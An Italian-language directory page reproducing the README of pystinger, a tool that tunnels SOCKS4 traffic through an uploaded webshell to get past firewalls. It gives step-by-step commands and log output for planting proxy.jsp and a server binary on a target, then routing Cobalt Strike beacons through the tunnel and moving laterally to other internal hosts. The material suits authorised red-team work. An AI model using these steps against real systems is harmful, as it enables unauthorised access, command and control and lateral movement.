Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pystinger — Bypassare il firewall per l'inoltro del traffico utilizzando webshell | Kitploit
Strumenti/GitHubGitHub/funnywolf/pystinger
Framework di ExploitGenerazione di PayloadEvasione IDS/IPSMovimento LateraleSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubfunnywolf/pystinger

pystinger

Bypassare il firewall per l'inoltro del traffico utilizzando webshell

Vedi Repository
1.4k2044 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

pystinger

Inglese | 简体中文

Pystinger implementa proxy SOCK4 e mapping delle porte tramite webshell.

Può essere usato direttamente da metasploit-framework, viper, cobalt strike per sessioni online.

Pystinger è sviluppato in Python e attualmente supporta tre script proxy: php, jsp(x) e aspx.

Utilizzo

Supponiamo che il nome di dominio del server sia http://example.com:8080. L'indirizzo IP della rete interna del server è 192.168.3.11

Proxy SOCK4

  • proxy.jsp Carica sul server di destinazione e assicurati che http://example.com:8080/proxy.jsp sia accessibile, la pagina restituisca UTF-8
  • stinger_server.exe Carica sul server di destinazione, AntSword esegue cmdstart D:/XXX/stinger_server.exeper avviare pystinger-server

Non eseguire direttamente D:/xxx/singer_server.exe, causerà la disconnessione TCP

  • Esegui ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sul tuo VPS
  • Vedrai il seguente output
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Ora hai avviato un proxy socks4a sul VPS 127.0.0.1:60000 per la rete interna di example.com.
  • Ora il server di destinazione (example.com) 127.0.0.1:60020 è stato mappato sul VPS 127.0.0.1:60020

Beacon di cobaltstrike online per singolo target

  • proxy.jsp Carica sul server di destinazione e assicurati che http://example.com:8080/proxy.jsp sia accessibile, la pagina restituisca UTF-8
  • stinger_server.exe Carica sul server di destinazione, AntSword esegue cmdstart D:/XXX/stinger_server.exeper avviare pystinger-server

Non eseguire direttamente D:/xxx/singer_server.exe, causerà la disconnessione TCP

  • Esegui ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sul tuo VPS
  • Vedrai il seguente output
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Aggiungi un listener su cobaltstrike, porta listener 60020 (porta Handler/LISTEN in RAT CONFIG dell'output), indirizzo listener 127.0.0.1
  • Genera il payload, caricalo sul target ed eseguito.

Beacon di cobaltstrike online per più target

  • proxy.jsp Carica sul server di destinazione e assicurati che http://example.com:8080/proxy.jsp sia accessibile, la pagina restituisca UTF-8
  • stinger_server.exe Carica sul server di destinazione, AntSword esegue cmdstart D:/XXX/stinger_server.exe 192.168.3.11per avviare pystinger-server (192.168.3.11 è l'indirizzo IP della rete interna del target)

192.168.3.11 può essere cambiato in 0.0.0.0

  • Esegui ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 sul tuo VPS
  • Vedrai il seguente output
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Aggiungi un listener su cobaltstrike, porta listener 60020 (porta Handler/LISTEN in RAT CONFIG dell'output), indirizzo listener 192.168.3.11
  • Genera il payload, caricalo sul target ed eseguito.
  • Quando ti sposti lateralmente su altri host, puoi puntare il payload a 192.168.3.11:60020 per far connettere il beacon

Intestazioni personalizzate e proxy

  • Se il webshell necessita di configurare cookie o autorizzazione, l'intestazione della richiesta può essere configurata tramite il parametro --header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • Se il webshell deve essere accesso tramite proxy, puoi impostare il proxy tramite --proxy --proxy "socks5:127.0.0.1:1081"

Strumenti correlati

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

Testato

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

Registro aggiornamenti

2.0 Data aggiornamento: 2019-09-29

  • Il servizio proxy Socks4 viene spostato sul client

2.1 Data aggiornamento: 2020-01-07

  • Supporto per cobaltstrike online (mapping delle porte)

Lo sviluppo è supportato dal software di JetBrains.
https://www.jetbrains.com/?from=pystinger

Scarica lo strumento